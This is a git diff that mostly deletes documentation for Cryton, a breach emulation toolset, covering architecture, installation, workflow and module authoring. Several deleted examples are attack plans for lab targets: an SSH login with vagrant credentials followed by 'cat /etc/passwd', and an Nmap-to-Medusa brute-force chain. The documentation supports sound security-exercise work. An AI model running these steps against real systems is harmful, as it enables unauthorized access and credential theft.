diff --git a/.gitlab-ci.yml b/.gitlab-ci.yml index 50d07095c5484b57ff2d68f357ad43f3688a1895..578d3db45d015f8b52de524e3eef225af57904de 100644 --- a/.gitlab-ci.yml +++ b/.gitlab-ci.yml @@ -11,6 +11,7 @@ stages: check_build: stage: test + image: registry.gitlab.ics.muni.cz:443/cryton/configurations/ci-base:latest before_script: - poetry install script: diff --git a/README.md b/README.md index 241bfc95e28ca424a6f059420573d1d561c7cb3e..d7f27a822a78906af4324645965edd9ebeec85d8 100644 --- a/README.md +++ b/README.md @@ -3,16 +3,7 @@ # Cryton documentation ## Description -Cryton is a breach Emulation & Attack Simulation Toolset. -It is a set of tools for complex attack scenarios' automation. Through usage of core and attack modules it provides ways -to plan, execute and evaluate multistep attacks. - -There are 5 main separate projects of Cryton toolset: -- **[Cryton Core](https://gitlab.ics.muni.cz/cryton/cryton-core)**: Contains Cryton Core functionality for working with database, task scheduler and execution mechanisms. -- **[Cryton Worker](https://gitlab.ics.muni.cz/cryton/cryton-worker)**: Contains functionality to execute attack modules both locally and remotely. -- **[Cryton Modules](https://gitlab.ics.muni.cz/cryton/cryton-modules)**: Contains attack modules that can be executed via Worker. -- **[Cryton CLI](https://gitlab.ics.muni.cz/cryton/cryton-cli)**: Command Line Interface for working with Cryton. It uses REST API, which is part of *Cryton Core*. -- **[Cryton Frontend](https://gitlab.ics.muni.cz/cryton/cryton-frontend)**: Graphical Interface for working with Cryton. It also utilizes REST API. +This project provides documentation for the Cryton toolset. [Link to the documentation](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/). @@ -35,8 +26,6 @@ To spawn a shell use: poetry shell ``` -Everything should be set, check out the [usage section](#usage). 
- ## Usage To build the documentation, run: ``` diff --git a/docs/2022.2/architecture.md b/docs/2022.2/architecture.md deleted file mode 100644 index c1f003c8139abfea6c3420c1477ff2b1074591b5..0000000000000000000000000000000000000000 --- a/docs/2022.2/architecture.md +++ /dev/null @@ -1,32 +0,0 @@ - - -## Core -All main functionality is implemented in Cryton Core. As the name suggests, this is the core component of the Cryton toolset. It provides all the functionality for parsing the attack Plan(s), creation of Executions, and scheduling (executing) of Runs. - -For issuing commands to Core, REST API allows HTTP requests and is utilized by CLI or Frontend for user interactions. - -## CLI and Frontend -There are two ways to interact with Cryton or, more precisely, to use its API. One of them is Cryton CLI, a python script that we can use to run actions from the terminal simply. A slightly more user-friendly is Cryton Frontend, a graphical web interface providing additional functionality to improve the user experience and make the automation process smoother. It uses Cryton Core's REST API as well. - -There is also the option to develop a completely custom application that will send HTTP requests to Cryton's REST API. If you are interested, you can find more about Cryton's REST API [here](interfaces/core-rest-api.md). - -## Worker -Cryton Core cannot act without Cryton Worker. In other words, Cryton Core creates messages that worker(s) consume, telling them what to do and when. - -Cryton Worker is a component for executing attack modules remotely. It utilizes Rabbit MQ as its asynchronous remote procedures call protocol. It connects to the Rabbit MQ server and consumes messages from the Core component or any other app that implements its Rabbit API. 
- -## Modules -For the Cryton Worker to perform specific actions tied to some known offensive security tool such as Metasploit, it needs to have installed Cryton Modules implementing their functionality in advance so the worker can use them. - -For example, we can have the Nmap module that implements the scanning capabilities of the Nmap tool or a module that implements the attacking abilities of Medusa brute force. These, among others, are in the form of Python scripts and are available from the Cryton developers. Moreover, you can [develop](modules/howto-create-attack-modules.md) other modules according to your needs. - -## Do I need to have all components installed? -If you are starting with Cryton, you should install all the main components - CLI, Core, Worker, and modules. - -Depending on your use case, the composition of Cryton may vary. For example, installing the Frontend is unnecessary if you wish to control Cryton using only the CLI. - -Further, worker(s) can be remotely controlled and installed on different machines than the Cryton Core. -Also, the package of modules you want to work with may vary depending on the attack scenarios. - -Moreover, it is also possible to use Cryton Worker as a standalone application and control it using your own requests -and receive responses on a custom queue. (for more information, visit [this](interfaces/worker-rabbit-api.md) section). diff --git a/docs/2022.2/designing-phase/session-management.md b/docs/2022.2/designing-phase/session-management.md deleted file mode 100644 index fb7c1a82a6da51d885f4b90cca3a3070cdb1680f..0000000000000000000000000000000000000000 --- a/docs/2022.2/designing-phase/session-management.md +++ /dev/null @@ -1,66 +0,0 @@ -One of the unique features of Cryton is the ability to create and use *sessions* - connections to the target systems. -When you successfully exploit a running network service on your target machine (victim), you open a connection to it. 
-In Cryton, this connection can be given a name and then used during the Plan execution in any Step (which is executed -on the same Worker node and supports this functionality). Metasploit Framework session management is used for storing -and interacting with sessions, and therefore must be available and running on the Worker node. - -```yaml -- name: step1 - arguments: - create_named_session: session_to_target_1 - ... -- name: step2 - arguments: - use_named_session: session_to_target_1 - ... -``` - -In the example above, step1 creates a named session *session_to_target_1* (in case it succeeds). -Its Metasploit ID gets stored in the database and can be used anywhere in the Plan, not only in the following Step -(as seen in the example). When the Plan creates multiple sessions to the same target, and the attacker does not care which -he is using, the *use_any_session_to_target* parameter can be used. - -```yaml -- name: step1 - arguments: - use_any_session_to_target: 192.168.56.22 - ... -``` - -## Plan example -```yaml ---- -plan: - name: Session example - owner: test name - stages: - - name: stage-one - trigger_type: delta - trigger_args: - seconds: 5 - steps: - - name: ssh-session - is_init: true - step_type: worker/execute - arguments: - create_named_session: session_to_target_1 - module: mod_msf - module_arguments: - exploit: auxiliary/scanner/ssh/ssh_login - exploit_arguments: - RHOSTS: 127.0.0.1 - USERNAME: vagrant - PASSWORD: vagrant - next: - - type: result - value: OK - step: session-cmd - - name: session-cmd - step_type: worker/execute - arguments: - use_named_session: session_to_target_1 - module: mod_cmd - module_arguments: - cmd: cat /etc/passwd - -``` diff --git a/docs/2022.2/designing-phase/template.md b/docs/2022.2/designing-phase/template.md deleted file mode 100644 index 9645e5e4a945bb6d1d5b7bdc8d0f67e91b12a168..0000000000000000000000000000000000000000 --- a/docs/2022.2/designing-phase/template.md +++ /dev/null @@ -1,21 +0,0 @@ -The most important 
part is creating a plan template. This is basically a Plan object written in YAML format. You can find a -detailed description of this format in section [Plan](plan.md). - - - -Template itself is not a fully described attack scenario. The structure of the Attack (execution tree) is correct, -but there are still unfilled places (e.g. IP addresses of targets or some other [inventory variables](plan-instance.md#inventory-files)). -This way an Attack Template can be designed before knowing these details and used in multiple different environments. - -The first step in designing a Plan (attack scenario) is creating a template. In this step the user is supposed to -write the whole scenario in the form of Plan, Stages and Steps. - -An abstract Plan can look like this: -```yaml -Plan - Stage 1 - Step 1 - Step 2 - Stage 2 - Step 3 -``` diff --git a/docs/2022.2/designing-phase/what-is-attack-scenario.md b/docs/2022.2/designing-phase/what-is-attack-scenario.md deleted file mode 100644 index 5e7641c65989e90dc4d9f05bafeae986ad2e34de..0000000000000000000000000000000000000000 --- a/docs/2022.2/designing-phase/what-is-attack-scenario.md +++ /dev/null @@ -1,17 +0,0 @@ -Let's start with the description of the attack scenario. I use attack scenario and Plan interchangeably - Plan is just -the name of the element in the formal description of the attack scenario. - -An attack scenario is a sequence of steps with some common objective. This objective may be data exfiltration, access to -target systems, denial of service, or any other harmful action. For some exercises, every attack should be -divisible into different stages. Imagine you have to attack infrastructure with multiple machines - each machine can -be a separate stage. Or you want to attack according to some kill-chain, e.g. the first stage would be scanning of the -infrastructure, the second is brute force attack on credentials to found systems, etc. 
- -The last and most important element of the Plan description is the attack step. This is the execution of an attack script or tool -against the target. A step can be running a Metasploit exploit, or running a Nmap scan. Steps are dependent on each other, -and so they create an execution tree, where each of them has set the list of successors based on some condition. The -condition may be a success or a string value returned by its predecessor. - -Putting this all together you get the whole attack scenario (called **Plan**), which is divided into different stages -(called **Stage**). Every stage is set to run at a specific time, as this is often required by the exercise. And finally, each -stage consists of attack steps (called **Step**), which are organized in a non-binary tree described above. diff --git a/docs/2022.2/dynamic-execution.md b/docs/2022.2/dynamic-execution.md deleted file mode 100644 index 559903d7335d040f0be7a7b9f089da8c93d6693f..0000000000000000000000000000000000000000 --- a/docs/2022.2/dynamic-execution.md +++ /dev/null @@ -1,249 +0,0 @@ -To support dynamic security testing. We've added support for creating dynamic plans. They allow the user to -create an empty Plan/Stage and create their agent to control the execution instead of Cryton's advanced scheduler. 
- -## Features -- Create a Plan/Step/Stage for dynamic execution (an empty list of Stages/Steps can be provided) -- Add Step to Stage execution and execute it -- Add Stage to Plan execution and start it -- Added Steps are automatically set as a successor of the last Step (only if the `is_init` variable is **not** set to *True* and a possible parent Step exists) - -## Limitations -- Dynamic plan must have a `dynamic` variable set to *True* -- If you don't want to pass any Stages/Steps you must provide an empty list -- Each Stage and Step must have a unique name in the same Plan (utilize [inventory variables](designing-phase/plan-instance.md#inventory-files) to overcome this limitation) -- The Stage/Step you're trying to add must be valid -- Run's Plan must contain the instance (Stage/Step) you are trying to execute -- You cannot create multiple executions for an instance (you can execute an instance only once) under the same Plan execution - -## Workflow example (using CLI) -For this example we will assume that: - -- Cryton Core is running (REST API is accessible at *localhost:8000*) -- Worker is registered in Core and running -- mod_cmd is accessible from the Worker - -If it isn't the case, feel free to follow the [installation example](getting-started/installation-example.md). - -Files used in this guide can be found in the [Cryton Core repository](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tree/stable/2022.2/examples/dynamic-execution-example). - -It's best to switch to the example directory, so we will assume that's true. 
-``` -cd /path/to/cryton-core/examples/dynamic-execution-example/ -``` - -### Building a base Plan and executing it -First, we create a template -``` -cryton-cli plan-templates create template.yml -``` - -Create a Plan (instance) -``` -cryton-cli plans create <template_id> -``` - -Add a Stage to the Plan (update the inventory file to your needs) -``` -cryton-cli stages create <plan_id> stage.yml -i stage-inventory.yml -``` - -Add an initial Step to the Stage -``` -cryton-cli steps create <stage_id> step-init.yml -``` - -Add a reusable Step to the Stage (update the inventory file to your needs) -``` -cryton-cli steps create <stage_id> step-reusable.yml -i step-reusable-inventory.yml -``` - -Create a Worker you want to test on -``` -cryton-cli workers create local -``` - -Create a Run -``` -cryton-cli runs create <plan_id> <worker_id> -``` - -Execute the Run -``` -cryton-cli runs execute <run_id> -``` - -### Start standalone Stage: -Add your Stage to the desired Plan (**Update the inventory file! Stage names must be unique.**) -``` -cryton-cli stages create <plan_id> stage.yml -i stage-inventory.yml -``` - -Start your Stage (its trigger) under the desired Plan execution -``` -cryton-cli stages start-trigger <stage_id> <plan_execution_id> -``` - -### Execute standalone Step: -Add your Step to the desired Stage (**Update the inventory file! Step names must be unique.**) -``` -cryton-cli steps create <stage_id> step-reusable.yml -i step-reusable-inventory.yml -``` - -Execute your Step under the desired Stage execution -``` -cryton-cli steps execute <step_id> <stage_execution_id> -``` - -### Check results - works only once the Run is created: -``` -cryton-cli runs report 1 --less -``` - -## Automation using Python -You will probably want to automate these actions rather than using CLI to do them. For this purpose, we will create a simple -Python script that will: - -1. Create a template -2. Create a Plan -3. Add a Stage -4. Add a Step -5. Create a Run -6. 
Execute the Run -7. Create a new Step -8. Execute the new Step -9. Get the Run report - -For this example we will assume that: - -- Cryton Core is running (REST API is accessible at *localhost:8000*) -- Worker is registered in Core and running -- mod_cmd is accessible from the Worker - -If it isn't the case, feel free to follow the [installation example](getting-started/installation-example.md). - -Once we have met all the requirements, we can copy the following script, **update the `WORKER_ID` variable**, and run it -using `python3 my_automation_script.py`. - -```python -import requests -import yaml -import time - -WORKER_ID = 0 - -TEMPLATE = { - "plan": { - "name": "example", - "owner": "Cryton", - "dynamic": True, - "stages": [] - } -} - -STAGE = { - "name": "no delay stage {{ id }}", - "trigger_type": "delta", - "trigger_args": { - "seconds": 0 - }, - "steps": [] -} - -STEP = { - "name": "initial step", - "step_type": "worker/execute", - "is_init": True, - "arguments": { - "module": "mod_cmd", - "module_arguments": { - "cmd": "whoami" - } - } -} - -STEP_REUSABLE = { - "name": "reusable step {{ id }}", - "step_type": "worker/execute", - "arguments": { - "module": "mod_cmd", - "module_arguments": { - "cmd": "{{ command }}" - } - } -} - - -def get_api_root(): - api_address = "localhost" - api_port = 8000 - return f"http://{api_address}:{api_port}/api/" - - -if __name__ == "__main__": - # Check if the Worker is specified - if WORKER_ID < 1: - raise Exception("Please specify a correct Worker ID at the top of the file.") - print(f"Worker id: {WORKER_ID}") - - # Get api root - api_root = get_api_root() - - # 1. Create a template - r_create_template = requests.post(f"{api_root}templates/", files={"file": yaml.dump(TEMPLATE)}) - template_id = r_create_template.json()['id'] - print(f"Template id: {template_id}") - - # 2. 
Create a Plan - r_create_plan = requests.post(f"{api_root}plans/", data={'template_id': template_id}) - plan_id = r_create_plan.json()['id'] - print(f"Plan id: {plan_id}") - - # 3. Add a Stage - stage_inventory = {"id": 1} - r_create_stage = requests.post(f"{api_root}stages/", data={'plan_id': plan_id}, - files={"file": yaml.dump(STAGE), "inventory_file": yaml.dump(stage_inventory)}) - stage_id = r_create_stage.json()['id'] - print(f"Stage id: {stage_id}") - - # 4. Add a Step - r_create_step = requests.post(f"{api_root}steps/", data={'stage_id': stage_id}, files={"file": yaml.dump(STEP)}) - step_id = r_create_step.json()['id'] - print(f"Step id: {step_id}") - - # 5. Create a new Run - r_create_run = requests.post(f"{api_root}runs/", data={'plan_id': plan_id, "worker_ids": [WORKER_ID]}) - run_id = r_create_run.json()["id"] - print(f"Run id: {run_id}") - - # 6. Execute the Run - r_execute_run = requests.post(f"{api_root}runs/{run_id}/execute/", data={'run_id': run_id}) - print(f"Run response: {r_execute_run.text}") - - # 7. Create a new Step - step_inventory = {"id": 1, "command": "echo test"} - r_create_step2 = requests.post(f"{api_root}steps/", data={'stage_id': stage_id}, - files={"file": yaml.dump(STEP_REUSABLE), - "inventory_file": yaml.dump(step_inventory)}) - step_id2 = r_create_step2.json()['id'] - print(f"Second step id: {step_id2}") - - # 8. Execute the new Step (First, get Stage execution's id) - stage_execution_id = requests.get(f"{api_root}runs/{run_id}/report/")\ - .json()["detail"]["plan_executions"][0]["stage_executions"][0]["id"] - r_execute_step = requests.post(f"{api_root}steps/{step_id2}/execute/", - data={'stage_execution_id': stage_execution_id}) - print(f"Second Step response: {r_execute_step.text}") - - # 9. Get Run report - for i in range(5): - time.sleep(3) - current_state = requests.get(f"{api_root}runs/{run_id}/").json()["state"] - if current_state == "FINISHED": - break - print(f"Waiting for a final state. 
Current state: {current_state}") - - print() - print("Report: ") - print(yaml.dump(requests.get(f"{api_root}runs/{run_id}/report/").json()["detail"])) - -``` \ No newline at end of file diff --git a/docs/2022.2/getting-started/installation-example.md b/docs/2022.2/getting-started/installation-example.md deleted file mode 100644 index d3c6b45153dfecfb42dd18e4a4e47a36a31f59c1..0000000000000000000000000000000000000000 --- a/docs/2022.2/getting-started/installation-example.md +++ /dev/null @@ -1,124 +0,0 @@ -# Installation example (local deployment) -This example will walk you through the installation of all Cryton components (locally), including the default attack modules. -However, we will only change the necessary settings, since this is primarily a showcase installation. -For Cryton to work correctly, **be strict about the order of components installation to preserve dependencies**. - -We will use **pipx** to install CLI and Worker with modules, and **Docker Compose** to install Core. - -Please make sure you are using a system that has at least 2048 MB of RAM and 2 CPU cores, otherwise you might experience stability issues. - -## Install prerequisites -The following packages might be missing on your system and are **necessary**: - -- *python3-pip* -- *python3-venv* - -Make sure you have installed and set up correctly the following tools: - -- [pipx](https://pypa.github.io/pipx/) (requires restarting terminal session) -- [curl](https://curl.se/) -- [Docker Compose](https://docs.docker.com/compose/install/) (requires system reboot) -- [git](https://git-scm.com/) - -Also make sure the directory `~/.local/` exists, since we will be using it for the installation. -```shell -mkdir -p ~/.local/ -``` - -## Install CLI -More information can be found in the [starting point](../starting-point/cli.md). - -First, we create an application directory and save settings into it. We will install the CLI afterward. 
-```shell -cd ~/.local/ -mkdir -p ~/.local/cryton-cli/ -curl -o ~/.local/cryton-cli/.env https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/stable/2022.2/.env -pipx install cryton-cli -``` - -## Install and run Frontend (optional) -More information can be found in the [starting point](../starting-point/frontend.md). - -First, we clone the repository and checkout the correct version. -Finally, we install and start Cryton Core and all necessary services (RabbitMQ, Postgres, PgBouncer). -```shell -cd ~/.local/ -git clone https://gitlab.ics.muni.cz/cryton/cryton-frontend.git -cd cryton-frontend -git checkout stable/2022.2 -sudo docker compose up -d --build -``` - -## Install and run Core -More information can be found in the [starting point](../starting-point/core.md). - -First, we clone the repository and checkout the correct version. -Finally, we install and start Cryton Core and all necessary services (RabbitMQ, Postgres, PgBouncer). -```shell -cd ~/.local/ -git clone https://gitlab.ics.muni.cz/cryton/cryton-core.git -cd cryton-core -git checkout stable/2022.2 -sudo docker compose -f docker-compose.yml -f docker-compose.prerequisites.yml up -d --build -``` - -## Download modules -More information can be found in the [starting point](../starting-point/modules.md). - -First, we clone the repository and checkout the correct version. -Afterward, we export a variable containing the path to the modules. -```shell -cd ~/.local/ -git clone https://gitlab.ics.muni.cz/cryton/cryton-modules.git -cd cryton-modules -git checkout stable/2022.2 -export CRYTON_MODULES_PATH=$(pwd)/modules -``` - -## Install and run Worker -More information can be found in the [starting point](../starting-point/worker.md). - -First, we create an application directory, download settings, and update them. We will install the Worker afterward. 
-```shell -cd ~/.local/ -mkdir -p ~/.local/cryton-worker/ -curl -o ~/.local/cryton-worker/.env https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/stable/2022.2/.env -sed -i "s|CRYTON_WORKER_MODULES_DIR=CHANGE_ME|CRYTON_WORKER_MODULES_DIR=$CRYTON_MODULES_PATH|" ~/.local/cryton-worker/.env -sed -i "s|CRYTON_WORKER_NAME=CHANGE_ME|CRYTON_WORKER_NAME=LocalWorker|" ~/.local/cryton-worker/.env -sed -i "s|CRYTON_WORKER_INSTALL_REQUIREMENTS=false|CRYTON_WORKER_INSTALL_REQUIREMENTS=true|" ~/.local/cryton-worker/.env -sed -i "s|CRYTON_WORKER_RABBIT_HOST=CHANGE_ME|CRYTON_WORKER_RABBIT_HOST=localhost|" ~/.local/cryton-worker/.env -pipx install cryton-worker -``` - -To start the worker use: -```shell -cryton-worker start -``` - -If you want to run the Worker in the background use: -```shell -nohup cryton-worker start > ~/.local/cryton-worker/std_out 2>&1 & -``` - -### Kill Worker running in the background -You might want to shut down the Worker, when you're now using it or want to change the settings. -Make sure you kill both of the created processes. -```shell -ps -aux | grep cryton-worker -kill <PID> <PID> -``` - -## Test the installation -Now we want to test if the CLI, Worker, and Core are communicating. - -Open a new terminal Window. 
- -Create (register) your Worker (the following command will return an ID in the response): -```shell -cryton-cli workers create LocalWorker -d "my local worker for testing" -``` - -Check if the Worker is reachable (replace the **id** parameter with the ID from the previous command): -```shell -cryton-cli workers health-check <id> -``` diff --git a/docs/2022.2/getting-started/workflow-example.md b/docs/2022.2/getting-started/workflow-example.md deleted file mode 100644 index f0f36bc835797a96b0ea29d2c8bdcb4346d0284b..0000000000000000000000000000000000000000 --- a/docs/2022.2/getting-started/workflow-example.md +++ /dev/null @@ -1,268 +0,0 @@ -## Prerequisites -Before you start with this example, it is assumed that: - -- [Core](../starting-point/core.md) is installed and running. -- [CLI](../starting-point/cli.md) is already installed. -- [Worker](../starting-point/worker.md) is already installed and running. -- [Modules](../starting-point/modules.md) are mounted to Worker. -- [Nmap](https://www.kali.org/tools/nmap/) and [Medusa](https://www.kali.org/tools/medusa/) tools are installed and accessible from Worker. -- Core and CLI are installed on the same machine. If not, see the Cryton CLI [settings](../starting-point/cli.md#settings) -or [usage](../starting-point/cli.md#usage) section to connect cryton-cli to cryton-core. - -If you haven't installed the Cryton toolset already, feel free to follow the [installation example](installation-example.md). - -## Cryton attack workflow -The following is the ideal sequence of steps to use when planning an attack and using Cryton to automate it. -First, you need to prepare an infrastructure for your cyber defense exercise. Once you have it, you can start planning your attack: - -1. Create an [attack plan template](../designing-phase/template.md). -2. Install and set up Core, CLI/Frontend. -3. Set up your Workers (one for each team): - - Download and mount the required modules for the plan. 
- - Install module prerequisites (attack tools, system requirements). - - Update the Worker settings and start it (Python dependencies can be installed on Worker startup). -4. Register Workers and create Run from the attack plan. -5. Execute or schedule the Run. - -## Create plan template -To execute our attack plan, we must create its [template](../designing-phase/template.md) (YAML) first – a description -of the actions required to run during attack execution based on tools used during the attack. - -We will be using a basic template example, which can be found -[here](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tree/stable/2022.2/examples) as well as other examples. - -```yaml ---- -# This is a simple example of Step chaining. -# Required modules: mod_cmd, mod_medusa. - -plan: - name: Basic example - owner: Cryton - stages: - - name: get-localhost-credentials - trigger_type: delta - trigger_args: - seconds: 0 - steps: - - name: check-ssh - is_init: true - step_type: worker/execute - arguments: - module: mod_nmap - module_arguments: - target: {{ target }} - ports: - - 22 - next: - - type: result - value: OK - step: bruteforce - - name: bruteforce - step_type: worker/execute - arguments: - module: mod_medusa - module_arguments: - target: {{ target }} - credentials: - username: {{ bruteforce.username }} - password: {{ bruteforce.password }} - -``` - -Once we are satisfied with our template, we can upload it using CLI: -```shell -cryton-cli plan-templates create path/to/template.yml -``` - -**Example:** -```shell -cryton-cli plan-templates create cryton-core/examples/basic-example/template.yml -Template successfully created! ({'id': 1}) -``` - -### Validating plan template -Before we upload the template, we should validate it. However, for our template to be validated correctly, -we have to provide an inventory file, which is described [here](#create-plan-instance). 
Once we have it, we can simply run: -```shell -cryton-cli plans validate path/to/template.yml -i path/to/my/inventory-file.yml -``` - -**Example:** -```shell -cryton-cli plans validate cryton-core/examples/basic-example/template.yml -i cryton-core/examples/basic-example/inventory.yml -Plan successfully validated! (<response>) -``` - -## Set up Worker(s) -**Notice:** If you've set up Cryton using the [installation example](installation-example.md), -and you're not using it for production, you can skip this section. - -Check if the Workers have the correct [settings](../starting-point/worker.md#settings), -mainly `CRYTON_WORKER_RABBIT_*`, `CRYTON_WORKER_NAME`, and `CRYTON_WORKER_MODULES_DIR`. - -Use the `--install-requirements` (`-I`) flag to install the requirements (python dependencies) at startup. - -If everything is set, you can start each worker: -```shell -cryton-worker start -``` - -If you want to run the Worker in the background use: -```shell -nohup cryton-worker start > ~/.local/cryton-worker/std_out 2>&1 & -``` - -**Notice:** If you're using Docker Compose to install and run Worker, and you've changed the settings, you have to restart the container. - -At this point, our worker is active and awaiting messages from Core. However, to be able to use it, we have to register it in Core's database. -We can do that using CLI (repeat for each Worker). Keep in mind that **WORKER_NAME** must -be the same as Worker’s `CRYTON_WORKER_NAME` variable: - -```shell -cryton-cli workers create <WORKER_NAME> -d <WORKER_DESCRIPTION> -``` - -**Example:** -```shell -cryton-cli workers create unique-name -d "kali-worker1 on 192.168.56.101" -Worker successfully created! ({'id': 1}) -``` - -To check if the Workers are running use a health check (repeat for each Worker): -```shell -cryton-cli workers health-check <WORKER_ID> -``` - -**Example:** -```shell -cryton-cli workers health-check 1 -The Worker successfully checked! 
(<response>) -``` - -## Create Plan instance -Now we need to create a Plan instance we will use for the execution. We can create it using the combination of -the previously uploaded template and an [inventory file](../designing-phase/plan-instance.md#inventory-files). - -Create the following inventory file: -```yaml ---- -target: 127.0.0.1 -bruteforce: - username: my_user - password: my_pass - -``` - -If you haven't uploaded the template, because you want to **validate it first**, see [this](#validating-plan-template) section. - -To create a new Plan instance use: -```shell -cryton-cli plans create <TEMPLATE_ID> -i path/to/my/inventory-file.yml -``` - -**Example:** -```shell -cryton-cli plans create 1 -i cryton-core/examples/basic-example/inventory.yml -Plan Instance successfully created! ({'id': 1}) -``` - -## Create Run -The last step we have to make is to create a new [Run](../execution-phase/run.md) from the previously created Plan instance -and Worker(s). To do so, use: -```shell -cryton-cli runs create <PLAN_INSTANCE_ID> <WORKER_ID1> <WORKER_ID2> <WORKER_ID3> ... -``` - -**Example:** -```shell -cryton-cli runs create 1 1 2 3 -Run successfully created! ({'id': 1}) -``` - -## Execute Run -Now that everything is prepared, we can execute our Run immediately or schedule it for later. To execute the Run immediately, use: -```shell -cryton-cli runs execute <RUN_ID> -``` - -**Example:** -```shell -cryton-cli runs execute 1 -Run successfully executed! (Run 1 was executed.) -``` - -## Schedule Run -Run executions can be scheduled to a specific date and time. By default, the system timezone will be used. To use UTC timezone, use the `--utc-timezone` flag. -```shell -cryton-cli runs schedule <RUN_ID> <DATE> <TIME> -``` - -**Example:** -```shell -cryton-cli runs schedule 1 2020-06-08 10:00:00 -Run successfully scheduled! (Run 1 is scheduled for 2020-06-08 10:00:00.) 
-``` - -## Pause/Resume Run -In case you need to pause a Run in progress use: -```shell -cryton-cli runs pause <RUN_ID> -``` - -**Example**: -```shell -cryton-cli runs pause 1 -Run successfully paused! (Run 1 was paused.) -``` - -Run will be paused after all the running Steps finish. - -To resume the execution use: -```shell -cryton-cli runs resume <RUN_ID> -``` - -**Example**: -```shell -cryton-cli runs resume 1 -Run successfully resumed! (Run 1 was resumed.) -``` - -## Report results -It is crucial to know the current state of your Run and its results. That is why a report can be generated anytime during the execution. - -### Show Run information -To see if the executed Run has finished, you can check its state (and other useful information): -```shell -cryton-cli runs show <RUN_ID> -``` - -**Example:** -```shell -cryton-cli runs show 1 -id: 1, schedule_time: None, start_time: 2021-05-24T00:08:45.200025, pause_time: None, finish_time: 2021-05-24T00:09:18.397199, state: RUNNING -``` - -### View report -Reports can be viewed directly in cryton-cli (**to quit, press Q**): -```shell -cryton-cli runs report <RUN_ID> --less -``` - -**Example:** -```shell -cryton-cli runs report 1 --less -``` - -### Generate report -You can also save the report into a file: -```shell -cryton-cli runs report <RUN_ID> -``` - -**Example:** -```shell -cryton-cli runs report 1 -Successfully created Run's report! 
(file saved at: /tmp/report_run_1_2020-06-08-10-15-00-257994_xdQeV) -``` diff --git a/docs/2022.2/logging.md b/docs/2022.2/logging.md deleted file mode 100644 index 306c499c7358f91acd1c604462016f0c3f0401fe..0000000000000000000000000000000000000000 --- a/docs/2022.2/logging.md +++ /dev/null @@ -1,41 +0,0 @@ -The logs adhere to the following format: -``` -{"queue": "cryton_core.control.request", "event": "Queue declared and consuming", "logger": "cryton-debug", "level": "info", "timestamp": "2021-05-18T11:19:20.012152Z"} -{"plan_name": "Example scenario", "plan_id": 129, "status": "success", "event": "plan created", "logger": "cryton", "level": "info", "timestamp": "2021-05-18T06:17:39.753017Z"} -``` - -When running in Docker, you can always check the logs by: -``` -docker logs CONTAINER_NAME -``` - -## Core -Every change of state is logged for later analysis. Every Step the result is also logged, although -output is not. It can be found in the database. - -### Loggers -You can choose from two loggers - **debug** or **production**, which you can set by environment variable *CRYTON_CORE_DEBUG*. - -For **production**: -- RotatingFileHandler *CRYTON_CORE_APP_DIRECTORY*/log/cryton-core.log - -For **debug**: -- RotatingFileHandler *CRYTON_CORE_APP_DIRECTORY*/log/cryton-core-debug.log -- Console (std_out) - -For running tests the **cryton-core-test** logger is used. - -## Worker -Each request and its processing are logged for later analysis. - -### Loggers -You can choose from two loggers - **debug** or **production**, which you can set by environment variable *CRYTON_WORKER_DEBUG*. - -For **production**: -- RotatingFileHandler *CRYTON_WORKER_APP_DIRECTORY*/log/cryton-worker.log - -For **debug**: -- RotatingFileHandler *CRYTON_WORKER_APP_DIRECTORY*/log/cryton-worker-debug.log -- Console (std_out) - -For running tests the **cryton-worker-test** logger is used. 
diff --git a/docs/2022.2/modules/howto-create-attack-modules.md b/docs/2022.2/modules/howto-create-attack-modules.md deleted file mode 100644 index 7762428f74aa0b356e7f40abd7ecef04e1e9831a..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/howto-create-attack-modules.md +++ /dev/null @@ -1,140 +0,0 @@ -In this section, we will discuss best practices and some rules that each module must follow. - -To understand what a module is, please see the description [here](../starting-point/modules.md). - -Here's an example of a typical module directory: -``` -my_module_name/ -├── mod.py -├── test_mod.py -├── README.md -├── requirements.txt -└── example.py -``` - -### mod.py -The most important file is the module itself (**must be called `mod.py`**). It consists of two main methods: -- `execute` (is used as an entry point for module execution; takes and returns **dictionary**) -- `validate` (is used to validate input parameters for the `execute` method; takes **dictionary** and returns 0 if it's okay, else raises an exception) - -The [input](https://gitlab.ics.muni.cz/cryton/cryton-worker#input-parameters) -and [output](https://gitlab.ics.muni.cz/cryton/cryton-worker#output-parameters) are specified in Worker. - -You can also use [prebuilt functionality](https://gitlab.ics.muni.cz/cryton/cryton-worker#prebuilt-functionality-for-modules) from Worker. - -Here's a simple example: -```python -def validate(arguments: dict) -> int: - if arguments != {}: - return 0 # If arguments are valid. - raise Exception("No arguments") # If arguments aren't valid. - -def execute(arguments: dict) -> dict: - # Do stuff. - return {"return_code": 0, "serialized_output": ["x", "y"]} - -``` - -And also a bit more complex example: -```python -from schema import Schema -from cryton_worker.lib.util.module_util import File - - -def validate(arguments: dict) -> int: - """ - Validate input arguments for the execute function. 
- :param arguments: Arguments for module execution - :raises: schema.SchemaError - :return: 0 If arguments are valid - """ - conf_schema = Schema({ - 'path': File(str), - }) - - conf_schema.validate(arguments) - return 0 - - -def execute(arguments: dict) -> dict: - """ - This attack module can read a local file. - Detailed information should be in README.md. - :param arguments: Arguments for module execution - :return: Generally supported output parameters (for more information check Cryton Worker README.md) - """ - # Set default return values - ret_vals = { - "return_code": -1, - "serialized_output": {}, - "output": "" - } - - # Parse arguments - path_to_file = arguments.get("path") - - try: # Try to get file's content - with open(path_to_file) as f: - my_file = f.read() - except IOError as ex: # In case of fatal error (expected) update output - ret_vals.update({'output': str(ex)}) - return ret_vals - - # In case of success update return_code to 0 (OK) and send the file content to the worker - ret_vals.update({"return_code": 0}) - ret_vals.update({'output': my_file}) - - return ret_vals - -``` - -### test_mod.py -Contains a set of tests to check if the code is correct. - -Here's a simple example: -```python -from mod import execute - - -class TestMyModuleName: - def test_mod_execute(self): - arguments = {'cmd': "test"} - - result = execute(arguments) - - assert result == {"return_code": 0} - -``` - -### README.md -README file should describe what the module is for, and its IO parameters, and give the user some examples. - -It should also say what system requirements are necessary (with version). - -### requirements.txt -Here are specified Python packages that are required to run the module. These requirements must be compliant with the -Python requirements in Cryton Worker. - -For example, if the module wants to use the `schema` package with version *2.0.0*, but the Worker requires version *2.1.1*, it won't work. 
